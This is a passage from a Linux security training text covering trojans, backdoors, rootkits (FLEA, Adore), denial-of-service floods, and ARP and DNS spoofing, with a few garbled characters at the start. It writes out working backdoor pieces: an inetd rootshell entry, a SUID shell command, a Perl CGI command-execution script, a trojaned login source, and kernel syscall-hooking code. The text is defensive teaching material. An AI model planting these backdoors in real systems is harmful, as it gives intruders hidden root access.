(o)(2)()(NULL)(')(7)()(t)(i)(n)(y)()(l)(e)

(c)(r)(o)()(t)(r)(o)(n)(c)()(d)(e)(v)(i)(e)(s)()(p)(l)(u)

(g)()(i)(n)(t)(o)()(t)(h)(e)()()()()()

()(s)(i)(t)()(b)(e)(t)(e)(e)()(t)(h)(e)()()({)(s)(/)()()()(?)()(P)()(D)(R)(O)(S)(:)()(P)(@)({)(:)

(I)(H)()(N)()(Y)()(L)(R)(U)(B)(P)(S)(T)(F)(


33/120

TROJANS AND BACKDOORS

Viruses and worms propagate to as many hosts as possible, causing intentional damage along

the way. Trojans provide an attacker with a means of remote entry into a system and most do

not self-replicate. Trojans rarely cause any damage because their intention is to remainundiscovered, and may be found in binaries or source code - the former being more likely.

Trojans take their name from the famous Trojan horse recounted in Homer's poem, The Iliad.

In computing, the term describes any apparently harmless code that has a hidden feature or

payload. A Trojans typical actions include:

Mailing /etc/shadow to the author

Adding a rootshell to /etc/inetd.conf or /etc/xinetd/

Adding a user with root access to /etc/passwd

Hiding files, processes, and network sockets used by the Trojan

Backdoors are generally installed by an attacker who has achieved (root) access and wants to

hold onto it. It is worth noting that much of the functionality of the two overlaps; as in the

previous examples, a Trojan typically installs a backdoor itself. In fact, a Trojan is a backdoorthat the system administrator is tricked into executing.

The Sendmail Trojan

The big security story of autumn 2002 was that ftp://ftp.sendmail.org had been cracked, and a

trojan had been planted in the Sendmail 8.12.6 tarball. An estimated 200 users downloading the

source code were affected between 6th

August and 28th

September (this figure would have been

much higher, but the ftpd was reportedly reconfigured so that only 1 in 10 users received the

Trojaned copy). Building the source code caused the backdoor to be compiled and launched.

The backdoor then opened a TCP connection to a fixed remote host, aclue.com, and awaited

instructions.

33


34/120

Modifying /etc/passwd

Perhaps the most common backdoor is the extra root account added to /etc/passwd, and the

presence of one of these - or any other unknown account - should immediately alert a system

administrator. Aside from user accounts, /etc/passwd also contains a lot of system accounts,

and a cunning attacker will attempt to masquerade his backdoor account as one of these.

Consider the following example:

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

printer:x:0:0:printer:/bin/bash

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

Did you spot the erroneous account in this list? The printer account has root-level privileges

(the uid is 0 in the third field), and has /bin/bash as its login shell. Most system accounts use

/sbin/nologin or /sbin/false to prevent users from logging into them. If in doubt, a look through

/etc/shadow should clarify the issue:

root:$1$K31Ojx8J$cqS7sHv2rZp2erEfCp.SW1:12222:0:99999:7:::

bin:*:12177:0:99999:7:::

daemon:*:12177:0:99999:7:::

adm:*:12177:0:99999:7:::

lp:*:12177:0:99999:7:::

sync:*:12177:0:99999:7:::

shutdown:*:12177:0:99999:7:::

34


35/120

halt:*:12177:0:99999:7:::

mail:*:12177:0:99999:7:::

printer:1$DrKD1mRs$TxPP4rs8Fw1E/oQ5K5e3HO1:12177:0:99999:7:::

news:*:12177:0:99999:7:::

uucp:*:12177:0:99999:7:::

operator:*:12177:0:99999:7:::

games:*:12177:0:99999:7:::

gopher:*:12177:0:99999:7:::

ftp:*:12177:0:99999:7:::

The second field of this file is the shadowed password; a * indicating that the account is

disabled, and !! indicating a null password. Something is very wrong here. An intruder has

probably modified entries in these files in order to allow himself privileged access.

Modifying /etc/inetd.conf

Another popular backdoor is the rootshell in /etc/inetd.conf. Inetd is the Internet "super-server",

a daemon responsible for overseeing much of the networking services in Linux. The format of

/etc/inetd.conf is as follows[4]:

For example:

ftp stream tcp nowait root /usr/sbin/tcpd proftpd

#telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd

pop3 stream tcp nowait root /usr/sbin/tcpd /usr/sbin/popa3d

The cracker types the following line to create a backdoor:

60000 stream tcp nowait root /bin/sh sh -i

Now anybody connecting to TCP port 60000 will be dropped into a rootshell. Remember that

the first argument in inetd.conf entries is simply a descriptive name, and is mapped against

/etc/services. Do not be fooled by:

35


36/120

nntp stream tcp nowait root /bin/sh sh -i

This is a rootshell listening on port 119 (the port usually associated with NNTP), not a legitimate

Network News Transfer Protocol (NNTP) server. It is also possible to launch a second instance

on inetd using a different configuration file, for example:

# inetd /tmp/backdoor_inetd.conf

This method is more noticeable because two instances of inetd now show up in the process

table.Most Linux distributions now include the more powerful xinetd as a replacement for inetd.

With xinetd, an attacker may place his backdoor in either /etc/xinetd.conf or the /etc/xinetd.d/

directory.Many networks employ aggressive filtering of inbound traffic, but very few apply the

same rigorous standards to packets leaving the network. An attacker can easily circumvent

these restrictions by using an outbound rootshell, such as in the Sendmail Trojan. This method

also allows attackers to reach machines with internal addresses, which would otherwise not be

reachable from the Internet.

Creating SUID Shells

In this method, an attacker makes a copy of a shell, and sets the SUID attribute on it:

cp /bin/bash /tmp/.cron_lockchmod 4755 /tmp/.cron_lock

If the attacker already has a legitimate account on the system, or has added a user-level

account to /etc/passwd (reasoning that a user account is less likely to be noticed by the

administrator than a root account), he can now execute /tmp/.cron_lock to obtain a root bash

shell. The SUID shell does not have to reside in /tmp; indeed, many systems periodically clean

out /tmp. If it is on a separate partition, it may be mounted to disallow SUID files anyway. The

SUID shell can have an inconspicuous name, such as /usr/sbin/kernel_probe or

/usr/local/bin/X11reset.

CGI Abuse

If you are running a publicly-accessible web server, Common Gateway Interface (CGI) scripts

36


37/120

offer another point of re-entry into the system. This can take the form of an attacker creating his

own CGI script, or, better still, modifying an existing script. A backdoor CGI can be as simple

as:

#!/usr/bin/perl

use CGI;

$q = new CGI;

print "Content-type:text/plain\n\n";

system ($q->param("command"));

The attacker can then execute any command on the machine by fetching the URL, for example:

http://example.com/cgi-bin/backdoor.pl?command=ls or

http://127.0.0.1/cgi-bin/backdoor.pl?command=ps%20auxf

Many CGI scripts use Perl modules, and a subtler way of creating a backdoor is to poison one

of them. In the previous example, Line 2 of the script uses CGI-instructed Perl to source the file

CGI.pm (in much the same way as C #include statements). By editing the CGI.pm module, a

backdoor can be created that, aside from being much harder to find, will also be accessible

from the majority of CGI scripts installed on the server.

ROOTKITS

Gaining access to a machine is only half the battle; the attacker needs to ensure that, once in,

the administrator will remain unaware of his presence, and that he may easily log back in at a

later date. Rootkits are specifically designed for this purpose. Basically a collection of small

programs, rootkits speed up and simplify the process. They may typically consist of a log

cleaner (which attempts to remove all traces of the cracker's presence from log files), Trojaned

versions of common shell commands (such as ls, ps, and netstat), and often an SSHD

configured to listen on a non-standard port - this is the attacker's means of re-entry.

Rootkits are divided into two types. The standard type replaces system binaries such as ps andls with Trojaned versions, modified to hide certain processes or files. Which files and processes

to hide are either compiled in, or read from, an external file. The latter method is preferred

because it allows the cracker to easily alter their behavior. These types of rootkits are not

terribly hard to discover. The big giveaway is the change in size of the Trojaned binaries. By

running strings on them, it is usually possible to see what is being hidden, or the location of a

37
http://127.0.0.1/cgi-bin/backdoor.pl?command=ps%20auxfhttp://127.0.0.1/cgi-bin/backdoor.pl?command=ps%20auxf


38/120

configuration file. After these binaries have been replaced with clean copies, the search for

backdoors can begin.

The second type of rootkit is the Loadable Kernel Module (LKM). These rootkits are, as the

name suggests, loaded into the Linux kernel as modules. By operating at the kernel level, they

remove the need for any alterations to system binaries. Consequently, techniques used in

discovering standard rootkits are often useless in detecting LKM kits.

Although the use of rootkits is very widespread, many administrators still do not know much

about them. Some of the most popular ones are given below:

FLEA

The FLEA rootkit consists of the following files:

flea/

flea/install

flea/trojs/

flea/trojs/ps.c

flea/trojs/netstat.c

flea/trojs/du.c

flea/trojs/pstree.c

flea/trojs/locate.cflea/trojs/process.h

flea/trojs/dir.h

flea/trojs/pshid.h

flea/sshd/

flea/sshd/pg

flea/sshd/sshd

flea/sshd/tconf

flea/sshd/leet/

flea/sshd/leet/ssh_host_key

flea/sshd/leet/ssh_host_key.pub

flea/sshd/leet/ssh_random_seed

flea/cleaner

flea/README

38


39/120

FLEA consists of the following trojaned binaries: ps, pstree, netstat, du, and locate. Backdoors

are provided in the form of patched versions of ssh and ulogin.

The install script moves the following files:

/bin/ps to /usr/lib/ldlibps.so,

/bin/netstat to /usr/lib/ldlibns.so,

/usr/bin/pstree to /usr/lib/ldlibpst.so,

/usr/bin/du /usr/lib/ldlibdu.so,

/usr/bin/slocate /usr/lib/ldlibct.so

and replaces all of them with Trojaned copies. As mentioned in README, the header files for

the Trojaned binaries need editing to set the processes to be hidden. By default, dir.h defines

the following hidden files/directories:

#define PROC10 "ld"

#define PROC11 ".config"

#define PROC12 "ssh"

#define PROC13 "/dev/..0"

processes.h defines any strings which should be hidden from the output of netstat:

#define ADD6 "ssh"

#define ADD7 "login"

#define ADD8 "teln"

pshid.h defines strings to be hidden from the output of ps:

#define PROCESS "/usr/lib/"

#define PROCESS2 "login"

#define PROCESS3 "ssh"

#define PROCESS4 "teln"

#define PROCESS5 "ftp"

#define PROCESS10 "cesso"

#define PROCESS11 "prot"

39


40/120

#define PROCESS12 "jool"

#define PROCESS18 "ld"

Now back to the installer, where the user is prompted to set a password, and ulogin.c is written

on the fly and compiled. /bin/login is moved to /usr/sbin/ login/, and replaced with the newly-

compiled login executable, the source code for which looks like the following:

ulogin.c:

#define PASSWORD *password here*

#include

#if !defined(PASSWORD)

#if !defined(_PATH_LOGIN)

# define _PATH_LOGIN "/usr/sbin/login"

#endif

main (argc, argv, envp)

int argc;

char **argv, **envp;

{

char *display = getenv("DISPLAY");

if ( display == NULL ) {

execve(_PATH_LOGIN, argv, envp);

perror(_PATH_LOGIN);

exit(1);}

if (!strcmp(display,PASSWORD)) {

system("/bin/bash");

exit(1);

}

execve(_PATH_LOGIN, argv, envp);

exit(1);

}

The attacker can now get a rootshell by setting the environmental variable DISPLAY to the

password before he attempts to login to the infected machine. It is time to install the SSHD.

After prompting the attacker for a port and password, /lib/security/.config/ssh/ is created to hold

the host key and config file. The pg binary is used to encrypt the entered password, which is

40


41/120

then written to /etc/ld.so.hash. The Trojaned SSHD is then copied over to /usr/bin/ssh2d,

launched in quiet mode (-q), and an entry is added to /etc/rc.d/rc.sysinit to start the daemon on

boot. Finally the rootkit installation directory is removed.

The SSHD binary is worth a second look. Running strings on it brings up some strange results,

notably GET /~telcom69/gov.php HTTP/1.0. A quick online search shows that the file is infected

with RST.b, a virus that infects ELF binaries. An analysis of the virus is available at

http://www.security-focus.com/archive/100/247640.

Once installed, FLEA (alongwith the other rootkits discussed here) provides the attacker an

opportunity to re-enter the system at a later date, while hiding his actions from the

administrator. To an uninitiated administrator, such rootkits can be very difficult to spot, and

may allow an intruder to remain undetected by, and with full control of, the system for months or

even years.

Adore (2.4.x Kernel)

Adore is a Loadable Kernel Module (LKM) rootkit. Unlike other rootkits, Adore does not need to

replace system binaries such as netstat with its own versions - it intercepts system calls and

modifies them as required:

drwxr-xr-x 2 pete users 4096 Jan 3 2002 CVS

-rw-r--r-- 1 pete users 1275 Jan 3 2002 Changelog-rw-r--r-- 1 pete users 1660 Jun 25 2000 LICENSE

-rw-r--r-- 1 pete users 1016 May 15 2001 Makefile.gen

-rw-r--r-- 1 pete users 3164 May 15 2001 README

-rw-r--r-- 1 pete users 52 Jun 1 2001 TODO

-rw-r--r-- 1 pete users 23665 Jan 3 2002 adore.c

-rw-r--r-- 1 pete users 2796 Dec 5 2001 adore.h

-rw-r--r-- 1 pete users 4212 Feb 26 2001 ava.c

-rw-r--r-- 1 pete users 1979 Dec 23 2000 cleaner.c

-rwxr-xr-x 1 pete users 4181 Jan 3 2002 configure

-rw-r--r-- 1 pete users 1904 Sep 19 2000 dummy.c

-rw-r--r-- 1 pete users 3417 May 13 2001 libinvisible.c

-rw-r--r-- 1 pete users 2527 Dec 21 2000 libinvisible.h

-rw-r--r-- 1 pete users 2191 May 13 2001 rename.c

41
http://www.security-focus.com/archive/100/247640http://www.security-focus.com/archive/100/247640


42/120

-rwxr-xr-x 1 pete users 193 Mar 21 2001 startadore

On with the installation:

# ./configure

Starting adore configuration ...

Checking 4 ELITE_UID ... found 30

Checking 4 ELITE_CMD ... using 15621

Adore's Makefile defines an ELITE_CMD, a six-digit number (for example, 15621) used as a

sort of password. A random number is used, unless explicitly set by the user:

Checking 4 SMP ... NO

Checking 4 MODVERSIONS ... NO

Checking for kgcc ... found cc Checking 4 insmod ... found /sbin/insmod --- OK

Loaded modules:

ipt_MASQUERADE 1272 2 (autoclean)

iptable_nat 14904 1 (autoclean) [ipt_MASQUERADE]

ip_conntrack 18016 1 (autoclean) [ipt_MASQUERADE iptable_nat]

iptable_filter 1644 1 (autoclean)

ip_tables 11768 5 [ipt_MASQUERADE iptable_nat

iptable_filter]

nfsd 67344 8parport_pc 14724 0

parport 23264 0 [parport_pc]

pcmcia_core 38112 0

ide-scsi 8048 0

3c59x 26736 2

Since Adores Version 0.33 requires "authentication" for its services, you will be prompted for a

password now, which will be compiled into "adore" and "ava", so you will not need to take any

further action. This procedure will save Adore from scanners. Choose a unique name that will

not clash with normal calls to :

Password (echoed):kermit

Preparing /home/pete/rk/adore (== cwd) for hiding ...

42


43/120

Creating Makefile ...

*** Edit adore.h for the hidden services and redirected

file-access ***

cp: cannot stat 'Makefile': No such file or directory

# make

rm -f adore.o

cc -c -I/usr/src/Linux/include -02 -Wall -DELITE_CMD=15621 \

-DELITE_UID=30 -DCURRENT_ADORE=42 -DADORE_KEY=\"kermit\" \

adore.c -o adore.o

In file included from adore.c:36:

/usr/src/Linux/include/Linux/malloc.h:4:2: warning: #warning

Linux/malloc.h is deprecated, use Linux/slab.h instead.

cc -02 -Wall -DELITE_CMD=15621 -DELITE_UID=30 \

-DCURRENT_ADORE=42 -DADORE_KEY=\"kermit\" ava.c \

libinvisible.c -o ava

cc -I/usr/src/Linux/include -c -02 -Wall -DELITE_CMD=15621 \

-DELITE_UID=30 -DCURRENT_ADORE=42 -DADORE_KEY=\"kermit\" \

cleaner.c -o cleaner

# ls -l

total 128

drwxr-xr-x 2 pete users 4096 Oct 2 2003 CVS/

-rw-r--r-- 1 pete users 1275 Jan 3 2002 Changelog-rw-r--r-- 1 pete users 1660 Jun 25 20:03 LICENSE

-rw-r--r-- 1 root root 707 Oct 26 03:03 Makefile

-rw-r--r-- 1 pete users 1016 May 15 2001 Makefile.gen

-rw-r--r-- 1 pete users 3164 May 15 2001 README

-rw-r--r-- 1 pete users 52 Jun 1 2001 TODO

-rw-r--r-- 1 pete users 23665 Jan 3 2002 adore.c

-rw-r--r-- 1 pete users 2796 Dec 5 2001 adore.h

-rw-r--r-- 1 root root 11320 Oct 26 03:03 adore.o

-rwxr-xr-x 1 root root 14771 Oct 26 03:03 ava*

-rw-r--r-- 1 pete users 4212 Feb 26 2001 ava.c

-rw-r--r-- 1 pete users 1979 Dec 23 2000 cleaner.c

-rw-r--r-- 1 root root 860 Oct 26 03:03 cleaner.o

-rwxr-xr-x 1 pete users 4181 Jan 3 2002 configure*

43


44/120

-rw-r--r-- 1 pete users 1904 Sep 19 14:47 dummy.c

-rw-r--r-- 1 pete users 3417 May 13 2001 libinvisible.c

-rw-r--r-- 1 pete users 2527 Dec 21 2000 libinvisible.h

-rw-r--r-- 1 pete users 2191 May 13 2001 rename.c

-rwxr-xr-x 1 pete users 193 Mar 21 2001 startadore*

We now have the ava binary, and two object files: adore.o and cleaner.o. startadore is simply a

shell script that loads the adore module into the kernel:

#!/bin/sh

# Use this script to bootstrap adore!

# It will make adore invisible. You could also

# insmod adore without $0 but then it is visible.

insmod adore.o

insmod cleaner.o

rmmod cleaner

cleaner.c simply removes the last loaded module from the module list.ava acts as a frontend to

the adore kernel module:

# ./ava

Usage: ./ava {h,u,r,R,i,v,U} [file, PID or dummy (for U)]h hide file

u unhide file

r execute as root

R remove PID forever

U uninstall adore

i make PID invisible

v make PID visible

But what's to stop the administrator from compiling his own copy of ava, and using it to uninstall

Adore? This is where ADORE_KEY comes in. libinvisible.c (used by ava) defines this function

for authentication:

adore_t *adore_init()

44


45/120

{

adore_t *ret = calloc(1, sizeof(adore_t));

if (mkdir(ADORE_KEY, 0) != 1) {

fprintf(stderr, "Couldn't authorize myself."

" Trying anyway ...\n");

remove(ADORE_KEY);

}

ret->version = close(ELITE_CMD+2);

return ret;

}

It attempts to create a directory with the name of the Adore key. If the return value is 1, the user

is authenticated.This is our first example of how Adore subverts system calls. Switching back to

the kernel module shows how this works. First, Adore imports the system call table:

extern void *sys_call_table[];

The REPLACE macro is called:

#define REPLACE(x) o_##x = sys_call_table[__NR_##x]; \

sys_call_table[__NR_##x] = n_##x

REPLACE(mkdir);

Now any calls to mkdir causes the n_mkdir function to be executed:

long n_mkdir(const char *path, int mode)

{

char key[64];

long r, l;

if ((l = strnlen_user(path, PATH_MAX)) < sizeof(key)) {

memset(key, 0, sizeof(key));

copy_from_user(key, path, l);

if (strcmp(key, ADORE_KEY) == 0) {

current->flags |= PF_AUTH;

45


46/120

return 1;

}

}

r = o_mkdir(path, mode);

return r;

}

If the directory name passed to mkdir matches the Adore key built into the module, return 1.

Otherwise, call the real mkdir (now renamed o_mkdir), and return its return code. There is

nothing special about the mkdir call. Any syscall could have been sabotaged for the

authentication mechanism, but mkdir has the advantage of not being otherwise used by Adore.

Adore hijacks other system calls in a similar manner, creating a wrapper around the call that

sanitizes the output. Here, the new ptrace function returns the -ESRCH ("No such process")

error if the pid is marked as hidden by Adore. Otherwise, the original ptrace function is called:

int n_ptrace(long request, long pid, long addr, long data)

{

if (is_invisible(pid))

return -ESRCH;

return o_ptrace(request, pid, addr, data);

}

Adore-ng (2.6.x Kernel)

The process of intercepting and sanitizing system calls worked fine in the 2.4.x kernel series,

but the release of the 2.6.x kernel put a stop to that. The syscall table was no longer exported,

so Adore needed another method of operation. Enter Adore-ng, which operated on the VFS

layer. The Virtual FileSystem (VFS) is an abstract layer that provides a uniform interface

between the myriad different filesystems that the kernel supports. Adore-ng replaces existing

handlers for directory listings of the /proc and /filesystems with its own handlers. Because

userland programs such as ps read their information from /proc, this provides an effective way

to hide files and processes.

46


47/120

ATTACKS AGAINST THE NETWORK

Many services in the past, such as Berkleys R* Suite (rlogin, rsh, and so on), relied purely on

the username and IP address of the client as a means of authentication; if your address

appears in another machine's .rhosts files, you can rlogin to that machine without supplying ausername and password. From a security point of view, this is not good. Secure Shell (SSH),

Secure Copy (SCP), and Secure File Transfer Protocol (SFTP) provide safer, encrypted

alternatives to Berkley's R* Suite, but some host-based authentication protocols are still

commonly in use - the most common is probably Network File System (NFS). One may argue

that this is a double-sided coin; after all, if no password is transmitted, there is no threat from an

attacker sniffing the connection, and subsequently using the password himself. Despite that, the

move away from host-based authentication to encrypted, password-protected services is

considered by just about everyone to be a good thing.

DENIAL OF SERVICE (DoS)

Denial of Service (DoS) attacks can generally be thought of as any attack that attempts to

deprive legitimate users of a service offered by the system or network by overloading a limited

resource, such as bandwidth, memory, disk space, or CPU time. The most popular DoS attacks

center around bandwidth deprivation and, particularly when distributed, have been a huge

problem in recent years, with many high-profile attacks against companies such as Yahoo!

and eBay.

The simplest form of bandwidth-limiting DoS attacks is to simply send more data to a machine

than it has resources to cope with. If all available bandwidth or resources to the target can be

used up, legitimate traffic cannot be processed. A primitive form of this attack is the ping flood,

where the target is bombarded with Internet Control Message Protocol (ICMP) echo requests,

clogging up the bandwidth in both directions, and putting a strain on the system's TCP/IP stack,

as the target attempts to reply to the pings. Many administrators are under the misconception

that blocking incoming ping requests at the firewall will solve this problem. Although this doeshalt the flow of ICMPs leaving the network, downstream bandwidth between the ISP and

perimeter firewall/router is still affected, so this solution is only partially effective.

Ping flooding is a battle of bandwidth, because the attacker must saturate the victim's line to the

degree that legitimate traffic flows inefficiently; even then, unless the victim's TCP/IP stack can

47


48/120

be overwhelmed responding to these ICMP packets, legitimate packets will still get through.

The typical corporate network uses a leased line (generally of at least 2 MB) for Internet

connectivity, whereas the average home user only has access to dial-up or DSL/cable - often

with upstream traffic capped significantly lower than downstream. This presents a problem to

the attacker, because the bandwidth odds are firmly stacked against him. One "solution" is to

launch the ping flood from a compromised machine on a fast network, a university, for example.

Another is to introduce a Distributed DoS (DDoS) attack. DDoS attacks - the next logical step in

ping flooding - use the available bandwidth of many networks to operate. If the thought of

receiving 100 kbps of ICMP traffic from one compromised machine is worrisome, imagine what

happens when 10 more machines join in the attack!

UDP flooding is also common, in addition to ICMP flooding (and it doesn't just have to be ICMP

echo requests that are used). As with ping flooding, it is advantageous if the target machine can

be persuaded to reply to the UDP datagrams, so ports running UDP-based services such as

chargen, echo, and quote are commonly targeted. ICMP and UDP traffic can be easily spoofed

(the source address changed), which can lead a nave administrator to assume that thousands

of machines are participating in the attack, and point an accusing finger at innocent parties.

Ping-Pong Attack

In addition to offering an attacker the ability to hide his origin, source address spoofing also

opens the door for so-called ping-pong attacks, named as such because packets bounce back

and forth like ping-pong balls. The step-by-step procedure is given below:

An attacker identifies two machines both running a UDP service such as chargen or echo. We

will assume echo in this example.

The attacker sends UDP datagrams to port 7 (the port the echo daemon runs on) of machine A,

with the packets forged to show machine B as the source address, and UDP port 7 as the

source port.

The echo daemon on machine A receives the datagram, and echoes it back to what it thinks is

the sender (machine B).

Machine B receives the datagram at its echo daemon, and echoes it back to machine A.

48


49/120

This process continues ad infinitum, until one machine crashes, or starts dropping the

datagrams.

The ping-pong attack illustrated in Figure 2.4 has the potential to cripple the network between

the two machines for a long time, because once the attack starts, it does not require the

attackers further intervention. Also note that the previous example referred to a single UDP

datagram - even from a slow connection, the attacker can slowly saturate each host's

connection and stack it with packets. Disabling unnecessary services such as echo and

chargen can eliminate the potential for this type of attack.

Figure 2.4

Distributed Flood Nets

With only a handful of compromised machines taking part in a distributed ping flood, the

attacker can easily Telnet in and manually start the attack on each, but when the number of

zombies, as they are commonly called, rises to a few hundred, this becomes impractical. DDoSattacks increased dramatically in 1999, as two tools, developed to coordinate such

compromised networks were released. Although Trinoo and TFN look primitive by today's

standards, and have become largely obsolete, they are worth reviewing because they form the

basis for many more recent DDoS agents.

49


50/120

The Smurf Attack

The Smurf is perhaps the most dangerous of bandwidth-consuming DoS attacks. It first gained

recognition in 1997 with the release of proof-of-concept code by TFreak. Since then, the Smurf,

and it's descendent, the Fraggle, have achieved widespread popularity with script writers

everywhere. In order to understand how the Smurf works, it is important to take a brief detour

into IP networking.

IP introduces the concept of a broadcast address, which is calculated by applying the subnet

mask to an address on the network; any data destined for this address is sent on to every host

on the network.

Pinging a broadcast address shows at a glance which hosts are alive on the network.

Not all networks are configured to respond to broadcast traffic in this manner, and many that

are, do not allow it to pass through border routers; but some networks do, and these are

referred to as broadcast amplifiers. Imagine the following scenario: an attacker sends a stream

of ICMP echo requests to the broadcast address of a well-populated network, having rewritten

the source address to that of the victim machine. Each machine on the broadcast amplifier

responds to the ping request with an ICMP echo reply. Unfortunately, all the machines on the

broadcast amplifier have been fooled as to the true source of the ping request, and send their

replies to the victim, swamping him or her with traffic.

A broadcast amplifier usually contains several hundred responsive hosts on its network;

occasionally, an amplifier containing several thousand hosts will emerge. Doing the math shows

that even from a dialup connection, an attacker can still generate enough traffic to saturate a

T1.

The Fraggle is a variation of the Smurf, which uses UDP broadcast traffic instead of ICMP.

Although not as serious as the Smurf, Fraggles can still generate a large volume of traffic,

including ICMP unreachable messages if the targeted UDP port is not open.

There is no complete defense against either attack. Firewall your network from the Internet; it is

the best option. The only real solution is to educate administrators about the dangers of

allowing their networks to be used as broadcast amplifiers.

50


51/120

SYN Flooding

One of the most popular DoS attacks is the SYN flood, in which the victim is bombarded with

connection requests, ultimately causing legitimate connections to be rejected, while consuming

system resources. Let us start by reviewing how a TCP connection between two hosts is

created. The client sends a TCP packet with the SYN (synchronization) flag set[7]. Upon receipt

of this packet, the server responds with a TCP packet, this time with the SYN and ACK

(acknowledgment) flags set. Finally, the client responds to the SYN-ACK with its own ACK. The

connection is now established, and data can flow.

What happens if the client fails to respond to the SYN-ACK? The server sits waiting for a short

time (generally 180 seconds), and then gives up; but memory assigned for the connection is

tied up during this waiting period. The idea behind SYN flooding is to bombard the server with

SYN packets, but not follow-up with the final ACK. This leaves hundreds of half-open

connections, all consuming memory. Eventually the server will run out of memory, or the kernel

will decide there are too many pending connections. Legitimate hosts new connection attempts

will be denied either way.

Non-bandwidth-oriented DoS Attacks

Most networking daemons log their activities, the verbosity of such logs generally being

configurable by the administrator. Log files can be quite large, and potentially fill-up the filingsystem. This may cause the daemons themselves to crash, not to mention causing dozens of

potential problems with the rest of the system. If an attacker can cause your log files to write a

large amount of data, he can perform a rather crude DoS attack. Most daemons log connection

attempts, so an exploiter of this problem can repeatedly create and tear down connections to

the daemon. Although it will take many hours to generate significant logging, it will ultimately be

effective. The most popular type of attack in this category is to send thousands of e-mails to the

target, a process known as mail-bombing. This uses up significant disk space, causes network

congestion, and increases the memory/CPU used by the Mail Transfer Agent (MTA), which

greatly annoys an administrator, who has to attempt to separate these e-mails from legitimate

e-mails. Unsolicited junk e-mail (spam) on busy mail servers (such as those owned by ISPs)

can have a similar effect due to sheer volume.

51


52/120

TCP/IP ATTACKS

TCP and IP, and, to a lesser extent, UDP protocols, form the Internets backbone. Attacks that

utilize shortcomings in these protocols can be potentially very serious, allowing an attacker to

hijack connections and intercept network traffic.

Closely related to IP are protocols such as ARP and DNS, which aid in identifying machines on

the Local Area Network (LAN) and on the Internet, respectively. Both are prime targets for

attack, as they offer the cracker the potential to impersonate other machines on the network,

perhaps allowing him to bypass host-based authentication or to receive sensitive data.

ARP Spoofing

Media Access Control (MAC) addresses are a property of the Ethernet adapter (i.e., the

networking card) of a host, providing a unique 48-bit physical address. The MAC allows hosts

on an Ethernet network to communicate, regardless of the overlying protocol. Sending data

from one machine to another on a LAN is a problem if the physical address is unknown. This is

where Address Resolution Protocol (ARP) comes in. ARP converts IP addresses to MAC

addresses, freeing higher levels from having to know anything about the networks physical

topology.

Each Ethernet host stores ARP entries in a table, and also in memory (known as the ARP

cache), for faster lookups. View a Linux machine's ARP table using the arp command:

# arp

Address HWtype HWaddress Flags Mask Iface

192.168.0.2 ether 00:01:03:D3:9F:E4 C eth0

cable-xxx.xx ether 00:0C:31:F5:54:8C C eth1

To populate this table in the first place, ARP sends out requests to all machines on the LAN

(even on a switched network), asking, "Are you the owner of IP address xxx.xxx.xxx.xxx?" Ifone of the recipients has this address, it replies with its MAC address. ARP is a stateless

protocol, and many machines will blindly cache replies, regardless of whether a request was

actually issued. ARP spoofing is the process of sending bogus replies to poison a client's

caches in an attempt to mislead them as to who owns which IP, resulting in packets being sent

52


53/120

to the wrong host, usually one under the attacker's control.

ARP spoofing generally precedes packet-sniffing, connection-hijacking, or an attack on a host-

based authentication service.

Domain Name System (DNS) Attacks

Domain name resolution is something we all take for granted. Even if we understand the

process behind it, most of us do not think about it when we enter http://www.google.com into

our web browsers. But what if a Domain Name System (DNS) cannot be trusted [Schuba93]?

What if, when we attempt to visit our favorite online store, the address resolves to that of a

black hat's server set up to look like the store?

Domain Name System (DNS) Cache Poisoning

BIND uses transaction IDs as an additional method of authenticating DNS replies (source port

and IP are among the others). In 1997, it was discovered that these IDs were chosen

sequentially, making it very easy for an attacker to send forged DNS replies. BINDs

subsequent versions implemented random IDs to combat this problem. In 2002, it was found

that even this was not enough: by sending hundreds of bogus replies (Figure 2.5), the chances

of hitting the correct ID increased, and DNS cache poisoning became a practical threat again.

Figure 2.5: DNS Cache Poisoning

The sequence of events in this attack is:

An attacker sends hundreds of queries for a particular domain. The attacker also sends spoofed

53
http://www.google.com/http://www.google.com/


54/120

replies to these queries. The nameserver believes that these replies have come from the

authorities nameserver, and caches the results for later use. Some

Date post:	04-Apr-2018
Category:	Documents
Upload:	umair-abid-minhas
View:	242 times
Download:	0 times

Open Source Security Tools Training Tool Kit

Documents